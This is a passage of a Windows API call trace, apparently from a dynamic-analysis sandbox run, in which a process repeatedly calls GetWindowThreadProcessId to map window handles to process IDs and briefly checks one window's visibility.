	[0471.452] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x538
	[0471.452] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.453] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x778
	[0471.453] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x778
	[0471.453] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.453] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.453] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.453] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.453] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.453] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.454] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.454] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.454] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x460
	[0471.454] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.454] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.454] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1694
	[0471.454] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1770
	[0471.454] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1720
	[0471.454] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x165c
	[0471.455] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1578
	[0471.455] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x16c0
	[0471.455] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x161c
	[0471.455] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1638
	[0471.455] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x15c8
	[0471.455] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1554
	[0471.455] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1674
	[0471.455] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1520
	[0471.456] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x14bc
	[0471.456] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xf8c
	[0471.456] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xe9c
	[0471.456] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1434
	[0471.456] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x14ec
	[0471.456] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xfcc
	[0471.456] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x12ac
	[0471.456] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1484
	[0471.457] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x934
	[0471.457] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xc0c
	[0471.457] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xb08
	[0471.457] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x948
	[0471.457] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1178
	[0471.457] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x13e0
	[0471.457] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xcd0
	[0471.457] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x13fc
	[0471.458] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xdc8
	[0471.458] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xc18
	[0471.458] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xc2c
	[0471.458] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xa1c
	[0471.458] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1244
	[0471.458] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xdb0
	[0471.458] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1398
	[0471.458] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1358
	[0471.459] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1370
	[0471.459] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1340
	[0471.459] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x130c
	[0471.459] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x12c0
	[0471.459] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x12e4
	[0471.459] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1270
	[0471.459] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1298
	[0471.459] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x120c
	[0471.460] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x122c
	[0471.460] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x11c4
	[0471.460] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x11b0
	[0471.460] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1188
	[0471.460] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1148
	[0471.460] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1160
	[0471.460] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x10fc
	[0471.460] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xe34
	[0471.460] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xea4
	[0471.461] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x514
	[0471.461] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xe48
	[0471.461] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xbc8
	[0471.461] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xdf8
	[0471.461] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x318
	[0471.461] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xcac
	[0471.461] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x8bc
	[0471.461] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xf9c
	[0471.462] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xf48
	[0471.462] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xe40
	[0471.462] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xecc
	[0471.462] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xeb8
	[0471.462] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xe80
	[0471.462] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xe98
	[0471.462] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xe60
	[0471.462] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xee4
	[0471.463] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xf00
	[0471.463] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xdf0
	[0471.463] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xe1c
	[0471.463] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xdd0
	[0471.463] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xd94
	[0471.463] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xd74
	[0471.464] GetWindow (hWnd=0x10368, uCmd=0x4) returned 0x0
	[0471.465] IsWindowVisible (hWnd=0x10368) returned 0
	[0471.465] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xd00
	[0471.465] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xcd8
	[0471.465] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xc84
	[0471.465] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xca4
	[0471.465] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xc64
	[0471.465] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xc24
	[0471.465] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xb84
	[0471.466] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xbac
	[0471.466] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x384
	[0471.466] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xab8
	[0471.466] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x33c
	[0471.467] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xa44
	[0471.467] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xa64
	[0471.467] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x8a8
	[0471.467] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xaf0
	[0471.468] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x88c
	[0471.468] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xb04
	[0471.468] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x910
	[0471.468] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x230
	[0471.468] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xac0
	[0471.468] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xab4
	[0471.468] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xaac
	[0471.468] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x3d0
	[0471.468] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x978
	[0471.469] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xa7c
	[0471.469] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x59c
	[0471.469] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xa88
	[0471.469] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xa6c
	[0471.469] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xa68
	[0471.469] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x9f8
	[0471.469] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xa04
	[0471.469] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x924
	[0471.470] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x8dc
	[0471.470] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x7dc
	[0471.470] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x768
	[0471.470] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x764
	[0471.470] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x820
	[0471.470] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x810
	[0471.470] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x794
	[0471.470] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x83c
	[0471.470] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x7ac
	[0471.471] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xb44
	[0471.471] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xb5c
	[0471.471] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x838
	[0471.471] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.471] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.471] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.471] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.471] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.472] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.472] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.472] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.472] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x818
	[0471.472] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x5b8
	[0471.472] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x494
	[0471.472] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1ec
	[0471.472] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x440
	[0471.472] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x7e8
	[0471.473] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x730
	[0471.473] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x2c8
	[0471.473] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x31c
	[0471.473] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x330
	[0471.473] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x128
	[0471.473] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x5c8
	[0471.473] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x6f8
	[0471.473] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x358
	[0471.474] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x73c
	[0471.474] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0xb0
	[0471.474] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x250
	[0471.474] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x240
	[0471.474] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x790
	[0471.474] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x61c
	[0471.474] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x540
	[0471.474] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x538
	[0471.475] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x568
	[0471.475] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x538
	[0471.475] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x568
	[0471.475] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x538
	[0471.475] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x540
	[0471.475] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x540
	[0471.475] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x57c
	[0471.475] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x460
	[0471.475] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x554
	[0471.476] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.476] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x528
	[0471.476] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.476] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.476] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.476] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x79c
	[0471.476] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.476] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4e0
	[0471.477] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.477] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x460
	[0471.477] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x460
	[0471.477] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x44c
	[0471.477] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x778
	[0471.477] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x460
	[0471.477] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x558
	[0471.477] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.478] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x4d0
	[0471.478] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1198
	[0471.478] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x1cdb40 | out: lpdwProcessId=0x1cdb40) returned 0x1080
